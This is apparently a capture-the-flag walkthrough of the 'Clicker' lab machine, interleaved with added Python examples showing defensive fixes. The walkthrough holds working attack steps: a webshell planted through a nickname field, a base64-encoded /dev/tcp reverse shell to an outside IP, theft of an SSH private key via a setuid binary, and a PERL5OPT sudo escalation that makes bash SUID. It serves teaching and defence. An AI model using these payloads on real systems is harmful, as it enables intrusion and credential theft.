Open ports from the nmap scan: 22, 80, 111, 2049, 39319, 41095, 46873, 48073, 60887
/etc/hosts entry: 10.129.62.93 clicker.htb
Pages found on the web application:
http://clicker.htb/login.php
http://clicker.htb/play.php
http://clicker.htb/info.php
http://clicker.htb/export.php
http://clicker.htb/register.php
Register an account (ivan:123456). The session cookie after login:
PHPSESSID=2cgonbun427jaletnuemcdl8a1
Because the nmap scan shows NFS open (ports 111 and 2049), check whether any directory is exported for mounting:
showmount -e 10.129.62.93
mount -t nfs 10.129.62.93:/mnt/backups /mnt -o nolock
I get a zip file called clicker.htb_backup.zip. Copy it and unzip it into a new folder; it contains the source code of the clicker web application.
Credentials for the SQL database, found in the source:
localhost clicker_db_user:clicker_db_password DB=clicker
Let's look at the "close and save" function of the web app.
The parameter name 'role' is filtered as a malicious word.
Let's see how to bypass the filter: header injection.
Try it out: the response is a redirection.
Log out and then log back in.
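The filter described above only refuses one exact parameter name, which is why a variant spelling can reach the UPDATE query. The following is an added example, not code from the writeup or from the Clicker application: it contrasts a deny-list check of that style with an allow-list of updatable columns and a parameterised query. The column names (clicks, level), the players table and the in-memory SQLite database are assumptions constructed for the example.

```python
import sqlite3

# Columns a player may update through the save endpoint. These names are
# assumptions for the example; the real application's schema is not shown.
ALLOWED_COLUMNS = ("clicks", "level")


def blacklist_allows(key: str) -> bool:
    """Deny-list check in the style the walkthrough describes: only a key that
    is exactly 'role' (ignoring case) is refused; every other key goes through
    to the query, including near-spellings of the blocked name."""
    return key.lower() != "role"


def allowlist_allows(key: str) -> bool:
    """Allow-list check: the key must be exactly one of the permitted columns.
    Nothing else, however it is spelled or padded, is accepted."""
    return key in ALLOWED_COLUMNS


def build_update(params: dict, username: str):
    """Build a parameterised UPDATE for the player's own row.

    Column names are taken from ALLOWED_COLUMNS, never from the request, so the
    request can only influence the bound values. Any unknown key aborts the
    whole update instead of being silently dropped.
    """
    rejected = [k for k in params if not allowlist_allows(k)]
    if rejected:
        raise ValueError(f"rejected keys: {rejected}")
    cols = [c for c in ALLOWED_COLUMNS if c in params]
    if not cols:
        raise ValueError("nothing to update")
    set_clause = ", ".join(f"{c} = ?" for c in cols)
    sql = f"UPDATE players SET {set_clause} WHERE username = ?"
    return sql, [params[c] for c in cols] + [username]


def save_game(conn: sqlite3.Connection, params: dict, username: str):
    """Apply a save request and return the row as stored (role, clicks, level)."""
    sql, args = build_update(params, username)
    conn.execute(sql, args)
    conn.commit()
    return conn.execute(
        "SELECT role, clicks, level FROM players WHERE username = ?", (username,)
    ).fetchone()


def demo():
    """Constructed in-memory database standing in for the game's players table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE players (username TEXT, role TEXT, clicks INTEGER, level INTEGER)"
    )
    conn.execute("INSERT INTO players VALUES ('ivan', 'User', 0, 1)")

    # A normal save: clicks and level change, role does not.
    stored = save_game(conn, {"clicks": 10, "level": 2}, "ivan")

    # A request that pads the blocked key. The deny-list lets it through
    # (the padded key is not exactly 'role'); the allow-list refuses it.
    padded = "role "
    deny_list_passed = blacklist_allows(padded)
    try:
        save_game(conn, {"clicks": 11, padded: "Admin"}, "ivan")
        allow_list_passed = True
    except ValueError:
        allow_list_passed = False
    return stored, deny_list_passed, allow_list_passed


if __name__ == "__main__":
    print(demo())
```

The design point is that identifiers in SQL cannot be bound as parameters, so the only safe source for a column name is a server-side list; user input should pick from that list, never be the list. Rejecting the whole request on an unknown key also gives the application a clean event to log.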
Here a new functionality called "administration" appears.
In this new functionality we can see the export path.
The file extension is controlled by export.php.
Try to access the export path:
exports/top_players_bz6cuda5.php
The uploaded file is accessible.
In authenticate.php, the parameter 'nickname' seems injectable with a webshell.
Play the game again, adding the parameter nickname as the webshell, then export it in administration.
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=whoami
The webshell is accessible.
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=cat%20/etc/passwd%20|%20grep%20-v%20nologin
We can see some user names on the server.
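The export step above works because the client chooses the file extension and the nickname is written into the file unescaped. The following is an added example, not code from the writeup or from the Clicker application: an export routine that keeps the extension on a server-side allow-list, generates the filename itself, escapes the nickname for the format being written, and creates the file without execute bits. The format set (txt, json, html), the players structure and the sample nicknames are constructed for the example.

```python
import html
import json
import os
import secrets
import tempfile

# Export formats the endpoint is willing to write. Assumed for the example;
# the point is that the client never chooses the extension or the filename.
ALLOWED_EXTENSIONS = ("txt", "json", "html")


def safe_text(value: str) -> str:
    """Strip control characters so a nickname cannot break the plain-text layout."""
    return "".join(ch for ch in value if ch.isprintable())


def render(players: list, ext: str) -> str:
    """Render the top-player list. Each format escapes for its own context."""
    if ext == "json":
        return json.dumps(players)
    if ext == "html":
        rows = "".join(
            f"<tr><td>{html.escape(p['nickname'])}</td><td>{int(p['clicks'])}</td></tr>"
            for p in players
        )
        return f"<table>{rows}</table>"
    if ext == "txt":
        return "\n".join(f"{safe_text(p['nickname'])}\t{int(p['clicks'])}" for p in players)
    raise ValueError(f"unsupported format: {ext}")


def export_top_players(players: list, ext: str, export_dir: str) -> str:
    """Write the export and return its path.

    The extension must be on the allow-list, the filename is generated
    server-side, and the file is created without execute bits.
    """
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext}")
    name = f"top_players_{secrets.token_hex(4)}.{ext}"
    path = os.path.join(export_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(render(players, ext))
    return path


def demo():
    """Constructed sample: one nickname carries markup, another a newline."""
    players = [
        {"nickname": "ivan", "clicks": 120},
        {"nickname": "<b>bold</b>", "clicks": 90},
        {"nickname": "multi\nline", "clicks": 10},
    ]
    with tempfile.TemporaryDirectory() as d:
        results = {}
        for ext in ("html", "txt"):
            path = export_top_players(players, ext, d)
            with open(path, encoding="utf-8") as fh:
                results[ext] = fh.read()
        # A request for a script extension is refused before anything is written.
        try:
            export_top_players(players, "php", d)
            php_refused = False
        except ValueError:
            php_refused = True
    return results, php_refused


if __name__ == "__main__":
    print(demo())
```

Independently of the application code, the web server should not hand files under the exports directory to a script handler at all; with both controls in place, a nickname is only ever data in a document the server itself chose the type of.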
echo "sh -i >& /dev/tcp/10.10.14.12/6666 0>&1" | base64
c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx
Create the reverse shell command, encode it in base64 and then URL-encode it:
echo%20%22c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx%22%20%7C%20base64%20-d%20%7C%20bash
We get the reverse shell.
After enumeration, we get into the /opt folder:
execute_query: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
Download it and open it in Ghidra.
In main(), inside the switch statement's "default" case, param_2 stands for the second argument. Trying it against the binary, it seems every value of param_1 other than 0-4 is treated as the case that executes, and param_2 then specifies the filename argument whose content is read. This program also seems to have privilege to access files in the same folder, including some .sql files that are not readable with our current user's privilege. Then, after enumeration:
./execute_query 6 ../.ssh/id_rsa
We can get the private key for user jack's authentication.
Because the OpenSSH key format is not correct as copied directly from the output, add two '-' characters to correct the format.
We get access as user jack.
jack@clicker:~$ sudo -l
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jack may run the following commands on clicker:
    (ALL : ALL) ALL
    (root) SETENV: NOPASSWD: /opt/monitor.sh
jack@clicker:~$ cat /opt/monitor.sh
#!/bin/bash

if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi

set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

unset PERL5LIB;
unset PERLLIB;

data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
    exit;
else
    timestamp=$(/usr/bin/date +%s)
    /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi
The script runs /usr/bin/xml_pp, a Perl tool.
Googling it, we find an exploit called perl_startup.
Here is the detail of its payload:
cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "/bin/bash"' exim -ps 2>&-})
Back on the target:
sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
bash -p
We get root.
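The privilege escalation above rests on two things visible in the listings: the sudoers rule carries SETENV, so env_reset no longer protects that command, and monitor.sh clears PERL5LIB and PERLLIB but not the other variables Perl honours at startup. The following is an added example, not code from the writeup or from the machine: a small audit that parses the sudo -l output shown above, flags SETENV rules, and checks a script for the Perl variables it fails to unset. It also flags the line set PATH=..., which in bash assigns the positional parameter $1 rather than PATH. The sudo output and script text are embedded as sample input; the list of Perl variables and the rule regex are the example's own.

```python
import re

# The sudo -l output from the walkthrough, embedded as sample input.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jack may run the following commands on clicker:
    (ALL : ALL) ALL
    (root) SETENV: NOPASSWD: /opt/monitor.sh
"""

# The relevant part of /opt/monitor.sh as shown in the walkthrough.
MONITOR_SH = r"""#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi
set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;
data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
"""

# Environment variables the Perl interpreter reads at startup. A privileged
# script that runs any Perl tool should clear all of them (list is the
# example's own, not from the page).
PERL_ENV_VARS = ("PERL5OPT", "PERL5DB", "PERL5LIB", "PERLLIB")

# Matches the per-command lines of `sudo -l`: "(runas) TAG: TAG: command".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rules(text):
    """Parse the command lines of `sudo -l` output into runas/tags/command."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t for t in re.split(r":\s*", m.group("tags")) if t]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": m.group("cmd").strip()})
    return rules


def setenv_rules(rules):
    """Rules tagged SETENV: the caller may supply environment for that command."""
    return [r for r in rules if "SETENV" in r["tags"]]


def unset_variables(script):
    """Names the script explicitly unsets."""
    found = set()
    for m in re.finditer(r"\bunset\s+([A-Za-z0-9_ ]+)", script):
        found.update(m.group(1).split())
    return found


def missing_perl_unsets(script):
    """Perl startup variables the script leaves in the environment."""
    return [v for v in PERL_ENV_VARS if v not in unset_variables(script)]


def misuses_set_for_path(script):
    """`set PATH=...` does not assign PATH in bash; it sets $1, so the
    inherited PATH stays in force. Flag it for the reviewer."""
    return re.search(r"^\s*set\s+PATH=", script, re.M) is not None


def audit(sudo_output, script):
    """Return human-readable findings for the rule set and the script."""
    findings = []
    for r in setenv_rules(parse_sudo_rules(sudo_output)):
        findings.append(f"SETENV on {r['cmd']} (runas {r['runas']})")
    for v in missing_perl_unsets(script):
        findings.append(f"{v} not cleared before running Perl tools")
    if misuses_set_for_path(script):
        findings.append("'set PATH=' does not set PATH (use 'export PATH=')")
    return findings


if __name__ == "__main__":
    for f in audit(SUDO_L_OUTPUT, MONITOR_SH):
        print(f)
```

The fixes the findings point at are small: drop SETENV from the sudoers entry so env_reset applies, replace set PATH= with export PATH=, and either unset PERL5OPT PERL5DB PERL5LIB PERLLIB before calling xml_pp or invoke it through env -i with an explicit PATH.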